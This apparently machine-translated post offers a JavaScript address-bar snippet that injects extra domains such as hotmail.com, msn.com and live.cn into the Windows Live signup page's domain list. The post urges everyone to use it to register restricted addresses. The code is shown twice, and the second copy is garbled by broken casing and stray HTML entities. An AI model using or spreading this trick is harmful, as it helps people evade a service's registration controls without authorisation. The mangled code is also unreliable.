Another Windows Live @live.com domain Registration vulnerability was found, now we simply through a simple piece of JS code can give Windows Live Registration interface Add @live.com address, it is surprising that the hard to plug in the address can be successfully registered to the account It's another great opportunity, everybody come on together!
Update: Updating code to provide more domain names, including live.cn
The method is simple:
1, enter this page: Http://get.live.com/getlive/overview
2, click the "Register Now" button
3, in the Address bar, paste the code in the following file, and enter:
Copy Code code as follows:
Javascript:function R (q) {} function s (q) {e[q] = new Option (A[q],a[q])}; R (E = document.getElementById ("Idomain"). options); R (d= "Live."); R (A = new Array ("hotmail.com", "hotmail.co.uk", "msn.com", d+ "com", d+ "be", d+ "co.uk", d+ "de", d+ "fr", d+ "it", d+ "NL", d+ " CN ")); for (i=0;i<a.length;i++) {s (i)}alert ("Success-additional domains added!");
After analysis:
Copy Code code as follows:
JavaScript:
Function r (q) {}
Function s (q) {e[q] =& Nbsp;new option (A[q],a[q])};
R (E = document.getelementbyid ("Idomain"). Options);
R (d= "Live.");
R (A = new array ("hotmail.com", "hotmail.co.uk", "msn.com", d+ "com", d+ "be", d+ "co.uk", d+ "de", d+ " Fr ", d+" it ", d+" NL ", d+" cn ");
for (i=0;i<a.length;i++) {
s (i )
}
Alert ("success - additional& Nbsp;domains added! ");